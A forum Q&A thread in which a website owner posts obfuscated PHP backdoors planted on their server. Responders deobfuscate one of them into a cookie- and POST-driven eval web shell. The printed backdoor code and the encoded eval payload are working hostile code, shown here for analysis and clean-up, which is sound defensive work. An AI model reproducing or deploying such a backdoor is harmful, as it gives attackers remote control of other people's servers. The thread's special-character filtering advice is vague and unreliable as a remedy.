Malicious code found - translation please?

Question

An unfriendly visitor left some code on my website. Unfortunately, the coding makes it hard to understand what he wants (probably full control over my server). Any help in deciphering the actual message would be greatly appreciated. The following snippets are from four different php files:

SNIPPET 1:

$plows = '6pk37x\'#8r9-taugidyecm40svno1Hf2*bl_';$dsmvel = Array();$dsmvel[] = $plows[13].$plows[0].$plows[28].$plows[10].$plows[3].$plows[28].$plows[19].$plows[0].$plows[11].$plows[13].$plows[3].$plows[30].$plows[31].$plows[11].$plows[22].$plows[28].$plows[33].$plows[22].$plows[11].$plows[10].$plows[4].$plows[33].$plows[17].$plows[11].$plows[0].$plows[31].$plows[30].$plows[4].$plows[8].$plows[30].$plows[4].$plows[22].$plows[23].$plows[17].$plows[22].$plows[22];$dsmvel[] = $plows[29].$plows[32];$dsmvel[] = $plows[7];$dsmvel[] = $plows[20].$plows[27].$plows[14].$plows[26].$plows[12];$dsmvel[] = $plows[24].$plows[12].$plows[9].$plows[35].$plows[9].$plows[19].$plows[1].$plows[19].$plows[13].$plows[12];$dsmvel[] = $plows[19].$plows[5].$plows[1].$plows[34].$plows[27].$plows[17].$plows[19];$dsmvel[] = $plows[24].$plows[14].$plows[33].$plows[24].$plows[12].$plows[9];$dsmvel[] = $plows[13].$plows[9].$plows[9].$plows[13].$plows[18].$plows[35].$plows[21].$plows[19].$plows[9].$plows[15].$plows[19];$dsmvel[] = $plows[24].$plows[12].$plows[9].$plows[34].$plows[19].$plows[26];$dsmvel[] = $plows[1].$plows[13].$plows[20].$plows[2];foreach ($dsmvel[7]($_COOKIE, $_POST) as $zboufyf => $dytfo){function acwsil($dsmvel, $zboufyf, $iqobpne){return $dsmvel[6]($dsmvel[4]($zboufyf . $dsmvel[0], ($iqobpne / $dsmvel8) + 1), 0, $iqobpne);}function mdzodxr($dsmvel, $vozlac){return @$dsmvel[9]($dsmvel[1], $vozlac);}function btfwmsl($dsmvel, $vozlac){$jlzfvu = $dsmvel3 % 3;if (!$jlzfvu) {eval($vozlac1);exit();}}$dytfo = mdzodxr($dsmvel, $dytfo);btfwmsl($dsmvel, $dsmvel[5]($dsmvel[2], $dytfo ^ acwsil($dsmvel, $zboufyf, $dsmvel8)));}

SNIPPET 2:

eval("\n\$dgreusdi = intval(LINE) * 337;");

$a = "7VdrT+NGFP1eqf9hiCIcKwHFj7ClIQh2Bd1V6bIthVZC1Jo4k2QSvzR2674raF/94zDk78GLOou5W6Uo2M7Zlzz33MnTs3JzzgTsySlsa674CIXjhROtQ95fX1zo/W+/IbhONgjMOSkqBqRbnffpvcPumbtIeBg4CfdZAQdMOuh43OdJK52Qf3KySaNIh674vqxWRAzvFg/WxqHApG3SlpNZ03l5c/vjsjNCZNNwznnDlhwAbH2UeyCvW1zF/rR4U5h9zwpyCfBnTChMODJU+otD+HhpIiOk8pmB8u4RNL674iZazpDG7MB2RswNR6y1ReodlZIsNvLavv674xyUtuJ3JuyWuIwMxzDI/r18dN5BaBm7rCfcnFHJ8ltFUNkWDJQgSkZHvj+vSnn2+M8OJs8vri+jR+e2YYV7+vTj9cee9vbk57b65XZxfXhvHDL97k9W/n7942Mm+qBsAZFoycOB6748mMSpc/hGSNYjtSY9AckfGbKsQYZqpxKrHF674uez5cXv36lDsByIaLROaOYDGjwp3Wh7mYQRm+XwSVROryKVNcyKd/L6eqltXmlsJxeZVzLI2+mr42/Xw6Z068GPo8jvHdakYsjDzWkQHxPDoMBU2YYuciXGMu/LVvDHFpNApxw9rCGT7o9kmTHyFBPLYh1/v1C7qWm6Vys41c3hayu6uiBLzdhtm83f505JrsPmGBdNiJqKA+7A/FKCO7bfI7HXmdDuVU3zZnd3olO9ThKI/s6743cqWmW95Xx4LKxYdcsVSZUbDuuIer9No1uNzjW48/BAdlqlvV6sPR2ijcZLymcRG9MZW0XjGT2cz674aTWcgmfDaK4nA0GzNN18lgQCoanq/up0LQj61cFZIPhrOkIhaveJIWhbwC8JeW0cXGIw3e+F6xGlQqqyitQm61aKndAXgSTaMl674+kOeA4er+Gasd/dMzQFkLnTUJ6mglOP/ykLghRUUao279onpvKJIRCFkIy0u5fQ5jKK3eNk3+ZvtRYUS1tzRBOKDTVnH2vPgJNFsPU1dgVjQaGY5CgKB1BFtUIW7w46745UG674N5miihTDFNajUsQ2sl8o4fuKzahSmje29sAtnxk8iBaJwrfhYjxmIiutm+Fk6G1Su7j+e0bnc+//AOGBWfq2OqSHsZ582iXCXg+DB7hf4f4O9y674674urg/oQQQ/DdLbNBggwPiHQJC8IHOkFiADdhgAG674AYgBjAGQAZQBmHJaYTAiZUgO674TAiZ674DJ79faYIDNBZoLMhFKrWzYNIAtkFsgskFkgsyBkQciCkAUhG0pt4GzgbOkLcDZwNnD2qxKhDS674bQj0I9b7aZPmf8Ksj1FV9Iipa2imSI5I1duuy2Cd6pecfpmhF74zSeJs2bals2sbdkZ2BVKrsAiVRjdQu6d6fn+vk6AgbvL5Lk5fsYpT0a674UVJ7T8ocGDBauSltwMFn6do5y0iVGJVdoZV7xpGy+IAv49kJYiFmvpfDRMZYM674YyveVlza2G6+1Hbzs2w3S7YffAHTrZeabr3Y9DrhJ8v/sc2rKfcY6GUiHZOu2gw33QPDJ2VdXDo5PsbpplL71JLsD9IfM67StC674iPSDlPZNZvbf3/GaSMR4QW93BZj+D1mZkDdbf"; $a = str_replace($dgreusdi, "E", $a); eval (gzinflate(base64_decode($a)));

SNIPPET 3: https://pastebin.com/TSv8uHFE

SNIPPET 4: https://pastebin.com/fbUWR6LR

Many thanks in advance!

score 1 · Answer 1 · answered Aug 08 '18 at 03:25

This code is obfuscated along with base64 encoding and gzinflating. You need to replace certain strings to get the proper encoded version of the script.

The script is using a key called pass and the attacker and later using the key and compromise your website. Its better to just rollback to your website if you have backup and then add a line to the header of the website to filter all special characters in GET & POST requests. The should stop attacker from injecting malicious codes.

Could you elaborate on that special character filter? Thank you! — Brokenstuff, Aug 08 '18 at 12:12

score 0 · Answer 2 · answered Aug 08 '18 at 08:36

I replaced the characters and formatted everything in a more readable way. However, there are some variables which are not declared properly. Not being an PHP-ninja, I could've just missed a language feature. For example $z is defined, but $z3 is used in the code. This should be invalid --> PHP returns null for undeclared variables.

$x = Array();
$x[0] = "a61931e6-a3f2-41b4-97bd-62f78f740d44";
$x[1] = "H*";
$x[2] = "#";
$x[3] = "count";
$x[4] = "str_repeat";
$x[5] = "explode";
$x[6] = "substr";
$x[7] = "array_merge";
$x[8] = "strlen";
$x[9] = "pack";

foreach (array_merge($_COOKIE, $_POST) as $key => $val) {
    function f2($x, $key, $i) {
        return substr(str_repeat($key . $x[0], ($i / $z) + 1), 0, $i);
    }
    function f3($x, $v) {
        return @pack("H*", $v);
    }
    function f1($x, $v) {
        $a = $x3 % 3;
        if (!$a) {
            eval($v1);
            exit();
        }
    }
    $val = f3($x, $val);
    f1($x, explode("#", $val ^ f2($x, $key, $z)));
}

The second snippet is impossible to decode without knowing LINE. The friendly members who commented on your question provided some links to similar question.

Just copy+paste the PHP code in an editor, replace weird variable names and decode it.

Brilliant - but how did you do this, manually? Unlike what the gentlemen who marked this as "duplicate" might think, I had already read the various threads on this site and tried decoding & deobfuscating via various online tools, but camue up shorthanded. — Brokenstuff, Aug 08 '18 at 12:11
Never mind - it is indeed all explained here: https://security.stackexchange.com/questions/115461/i-found-unknown-php-code-on-my-server-how-do-i-de-obfuscate-the-code (thanks for the link, I hadn't found that in earlier searches) — Brokenstuff, Aug 08 '18 at 12:47
First, I formatted it like regular code (there a also tools for this), search&replace'ed all weird variable names in an editor and manually replaced all calls to the array with the respective field-content. That's it, basically. — GxTruth, Aug 08 '18 at 13:39

Malicious code found - translation please?

2 Answers2